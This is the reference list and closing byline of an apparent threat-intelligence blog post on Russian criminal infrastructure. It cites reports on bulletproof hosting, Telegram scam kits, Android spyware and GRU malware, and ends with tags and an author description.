  8. TechRadar. "Russia's state-backed MAX app may know if you are using a VPN" (2026 reverse-engineering analysis; corroborated by RKS Global; MAX denied). techradar.com.
  9. Meduza. "The Kremlin spent years building a messenger to replace Telegram. Now it's reportedly telling soldiers the substitute is too insecure to use at the front," February 23, 2026 (sourced to Mediazona and pro-war military channels; denied by the Kremlin). meduza.io.
  10. Group-IB. "Inside Classiscam," March 1, 2021. group-ib.com.
  11. ESET WeLiveSecurity. "Telekopye: Hunting Mammoths using a Telegram bot," August 24, 2023. welivesecurity.com.
  12. Qurium Media Foundation. "Exposing the evil empire of Doppelganger disinformation" (names AS215428 / MYKYTASKOROB), July 2024. qurium.org.
  13. U.S. Department of the Treasury / OFAC. Press release sb0185, "Treasury Sanctions Bulletproof Hosting Service Aeza Group," July 1, 2025. home.treasury.gov.
  14. Council of the EU. "Russian hybrid threats: EU lists further 21 individuals and 6 entities" (Stark Industries), May 20, 2025. consilium.europa.eu.
  15. KrebsOnSecurity. "Stark Industries Solutions: An Iron Hammer in the Cloud," May 23, 2024. krebsonsecurity.com.
  16. KrebsOnSecurity. "Bulletproof Host Stark Industries Evades EU Sanctions," September 11, 2025. krebsonsecurity.com.
  17. Al Jazeera. "Russia now says 89 killed in Ukraine attack, blames mobile phones," January 4, 2023. aljazeera.com.
  18. RUSI (Dan Black). "Russia's Cyber Campaign Shifts to Ukraine's Frontlines," July 22, 2024. rusi.org.
  19. Doctor Web. "Android.Spy.1292.origin" (trojanized Alpine Quest targeting Russian military), April 23, 2025. news.drweb.com.
  20. The Record. "Hackers pose as women seeking romance to target Russian military" (SiribClone / SafeLoveStealer), June 9, 2026. therecord.media.
  21. CISA. Malware Analysis Report AR23-243a, "Infamous Chisel," August 31, 2023. cisa.gov.
  22. NCSC-UK. "UK and allies support Ukraine, calling out Russia GRU malware campaign," August 31, 2023. ncsc.gov.uk.
  23. Google Threat Intelligence Group. "Signals of Trouble: Russia targeting Signal Messenger," February 20, 2025. cloud.google.com.
  24. CrowdStrike. "Danger Close: Fancy Bear Tracking of Ukrainian Field Artillery Units," December 2016. crowdstrike.com.
Tags: infrastructure, bulletproof-hosting, phishing-as-a-service, android-spyware, threat-intelligence, sanctions-evasion, OSINT, malware-analysis

CrimsonVector, investigative research by Diego Parra into criminal infrastructure, threat-actor attribution, and security research. Defanged URLs and IPs are intentionally bracketed per responsible disclosure conventions.